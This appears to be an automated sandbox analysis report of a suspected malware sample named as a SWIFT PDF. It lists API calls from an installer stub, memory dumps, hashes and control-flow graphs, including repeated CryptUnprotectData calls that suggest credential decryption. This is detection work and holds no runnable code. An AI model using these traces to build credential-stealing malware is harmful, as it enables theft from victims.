                                                                                                                                      • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                      • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                                      • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                      • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                      • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                      • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3585118688-0
                                                                                                                                    • Opcode ID: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                                                                                                                                    • Opcode Fuzzy Hash: b55d93dfb97ddf8a14339bcde7d47e4fb5e20aa6c656398e0056b6fada52b68e
                                                                                                                                    • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2102729457-0
                                                                                                                                    • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                    • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                    • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 00405AC2
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                                      • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                                    • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SWIFT09181-24_pdf.exe"), ref: 00405B6A
                                                                                                                                    • GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3248276644-3081826266
                                                                                                                                    • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                                                                                                                                    • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                                                                                                                                    • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                                                                                                                                    APIs
                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405748
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                    • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                    • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040382A
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403809
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                                                    • Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
                                                                                                                                    • Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
                                                                                                                                    • Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
                                                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,C:\Users\user\Desktop\SWIFT09181-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharPrevlstrlen
                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                    • API String ID: 2709904686-224404859
                                                                                                                                    • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
                                                                                                                                    • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                                                    • Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9
                                                                                                                                    APIs
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2635351082.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2635332703.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635371796.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2635394979.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_10000000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1780285237-0
                                                                                                                                    • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                                                    • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                                                    • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2617234621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2617219411.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617290785.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617308290.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2617473125.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                    • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                    • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:12%
                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                    Signature Coverage:16.7%
                                                                                                                                    Total number of Nodes:36
                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                    execution_graph 28979 15b158 28980 15b174 28979->28980 28984 37910198 28980->28984 28988 37910188 28980->28988 28981 15b1a3 28985 379101a4 28984->28985 28992 3791c638 28985->28992 28986 379101da 28986->28981 28989 379101a4 28988->28989 28991 3791c638 CryptUnprotectData 28989->28991 28990 379101da 28990->28981 28991->28990 28994 3791c66a 28992->28994 28993 3791caf9 28993->28986 28994->28993 28996 3791cf01 28994->28996 28997 3791cf10 28996->28997 29001 3791d550 28997->29001 29009 3791d540 28997->29009 28998 3791cf80 28998->28994 29002 3791d575 29001->29002 29003 3791d629 29001->29003 29002->29003 29007 3791d550 CryptUnprotectData 29002->29007 29008 3791d540 CryptUnprotectData 29002->29008 29017 3791d730 29002->29017 29021 3791d1ec 29003->29021 29007->29003 29008->29003 29010 3791d550 29009->29010 29013 3791d629 29010->29013 29014 3791d730 CryptUnprotectData 29010->29014 29015 3791d550 CryptUnprotectData 29010->29015 29016 3791d540 CryptUnprotectData 29010->29016 29011 3791d1ec CryptUnprotectData 29012 3791d7f5 29011->29012 29012->28998 29013->29011 29014->29013 29015->29013 29016->29013 29018 3791d6fc 29017->29018 29018->29017 29019 3791d1ec CryptUnprotectData 29018->29019 29020 3791d7f5 29019->29020 29020->29003 29022 3791d9e0 CryptUnprotectData 29021->29022 29023 3791d7f5 29022->29023 29023->28998

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 239 155f90-155fc6 240 155fce-155fd4 239->240 370 155fc8 call 1560e0 239->370 371 155fc8 call 155f90 239->371 372 155fc8 call 155968 239->372 241 156024-156028 240->241 242 155fd6-155fda 240->242 245 15603f-156053 241->245 246 15602a-156039 241->246 243 155fdc-155fe1 242->243 244 155fe9-155ff0 242->244 243->244 247 1560c6-156103 244->247 248 155ff6-155ffd 244->248 251 15605b-156062 245->251 367 156055 call 158d90 245->367 368 156055 call 158da0 245->368 369 156055 call 1590a8 245->369 249 156065-15606f 246->249 250 15603b-15603d 246->250 260 156105-15610b 247->260 261 15610e-15612e 247->261 248->241 254 155fff-156003 248->254 252 156071-156077 249->252 253 156079-15607d 249->253 250->251 256 156085-1560bf 252->256 253->256 257 15607f 253->257 258 156005-15600a 254->258 259 156012-156019 254->259 256->247 257->256 258->259 259->247 262 15601f-156022 259->262 260->261 268 156135-15613c 261->268 269 156130 261->269 262->251 270 15613e-156149 268->270 271 1564c4-1564cd 269->271 272 1564d5-156511 270->272 273 15614f-156162 270->273 281 156513-156518 272->281 282 15651a-15651e 272->282 278 156164-156172 273->278 279 156178-156193 273->279 278->279 286 15644c-156453 278->286 287 156195-15619b 279->287 288 1561b7-1561ba 279->288 283 156524-156525 281->283 282->283 286->271 291 156455-156457 286->291 289 1561a4-1561a7 287->289 290 15619d 287->290 292 156314-15631a 288->292 293 1561c0-1561c3 288->293 295 1561da-1561e0 289->295 296 1561a9-1561ac 289->296 290->289 290->292 294 156406-156409 290->294 290->295 297 156466-15646c 291->297 298 156459-15645e 291->298 292->294 299 156320-156325 292->299 293->292 300 1561c9-1561cf 293->300 305 1564d0 294->305 306 15640f-156415 294->306 307 1561e6-1561e8 295->307 308 1561e2-1561e4 295->308 301 156246-15624c 296->301 302 1561b2 296->302 297->272 303 15646e-156473 297->303 298->297 299->294 300->292 304 1561d5 300->304 301->294 311 156252-156258 301->311 302->294 309 156475-15647a 303->309 310 1564b8-1564bb 303->310 304->294 305->272 312 156417-15641f 306->312 313 15643a-15643e 306->313 314 1561f2-1561fb 307->314 308->314 309->305 319 15647c 309->319 310->305 318 1564bd-1564c2 310->318 320 15625e-156260 311->320 321 15625a-15625c 311->321 312->272 322 156425-156434 312->322 313->286 317 156440-156446 313->317 315 1561fd-156208 314->315 316 15620e-156236 314->316 315->294 315->316 342 15623c-156241 316->342 343 15632a-156360 316->343 317->270 317->286 318->271 318->291 323 156483-156488 319->323 324 15626a-156281 320->324 321->324 322->279 322->313 328 1564aa-1564ac 323->328 329 15648a-15648c 323->329 335 156283-15629c 324->335 336 1562ac-1562d3 324->336 328->305 331 1564ae-1564b1 328->331 332 15648e-156493 329->332 333 15649b-1564a1 329->333 331->310 332->333 333->272 334 1564a3-1564a8 333->334 334->328 338 15647e-156481 334->338 335->343 346 1562a2-1562a7 335->346 336->305 348 1562d9-1562dc 336->348 338->305 338->323 342->343 350 156362-156366 343->350 351 15636d-156375 343->351 346->343 348->305 349 1562e2-15630b 348->349 349->343 366 15630d-156312 349->366 353 156385-156389 350->353 354 156368-15636b 350->354 351->305 352 15637b-156380 351->352 352->294 356 1563a8-1563ac 353->356 357 15638b-156391 353->357 354->351 354->353 359 1563b6-1563d5 call 1566b8 356->359 360 1563ae-1563b4 356->360 357->356 358 156393-15639b 357->358 358->305 362 1563a1-1563a6 358->362 363 1563db-1563df 359->363 360->359 360->363 362->294 363->294 364 1563e1-1563fd 363->364 364->294 366->343 367->251 368->251 369->251 370->240 371->240 372->240
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                    • API String ID: 0-2525668591
                                                                                                                                    • Opcode ID: 07fcd04cdabdf48ba845cd9b08121edf13511035c901dd95cf2002b70368f4e1
                                                                                                                                    • Instruction ID: 2c5b4e0431c06d2f599263ddc3bfc05996009ce71177b2cf6e7055a030a54797
                                                                                                                                    • Opcode Fuzzy Hash: 07fcd04cdabdf48ba845cd9b08121edf13511035c901dd95cf2002b70368f4e1
                                                                                                                                    • Instruction Fuzzy Hash: EC124130A00219DFCB15CF69C994AADBBF2BF88316F558065E825DF261DB31DD89CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 374 154328-154368 376 15436f-15444c call 153168 call 152c88 374->376 377 15436a 374->377 387 154453-154471 376->387 388 15444e 376->388 377->376 418 154474 call 154620 387->418 419 154474 call 15461d 387->419 388->387 389 15447a-154485 390 154487 389->390 391 15448c-154490 389->391 390->391 392 154495-15449c 391->392 393 154492-154493 391->393 395 1544a3-1544b1 392->395 396 15449e 392->396 394 1544b4-1544f8 393->394 400 15455e-154575 394->400 395->394 396->395 402 154577-15459c 400->402 403 1544fa-154510 400->403 409 1545b4 402->409 410 15459e-1545b3 402->410 407 154512-15451e 403->407 408 15453a 403->408 411 154520-154526 407->411 412 154528-15452e 407->412 413 154540-15455d 408->413 410->409 414 154538 411->414 412->414 413->400 414->413 418->389 419->389
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
                                                                                                                                    • API String ID: 0-1487592376
                                                                                                                                    • Opcode ID: 702d89d02b889b3ebe8ce585ae3d6848454f08b7498ee6a0d46a36b76ca51977
                                                                                                                                    • Instruction ID: 4f117def9fc5c31635b03fcbd333cedcc7ff54eed15b9ea525642d14b5f95e79
                                                                                                                                    • Opcode Fuzzy Hash: 702d89d02b889b3ebe8ce585ae3d6848454f08b7498ee6a0d46a36b76ca51977
                                                                                                                                    • Instruction Fuzzy Hash: 3191E774E00218CFDB18DFA9D884A9DBBF2BF89305F14C069E819AB365DB349985CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922470617.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_150000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                    • Opcode ID: 9ed30bf50f7bce0c36e99e732d8407e8b8d744ce3c5b49a1e45278b7ccbbab4e
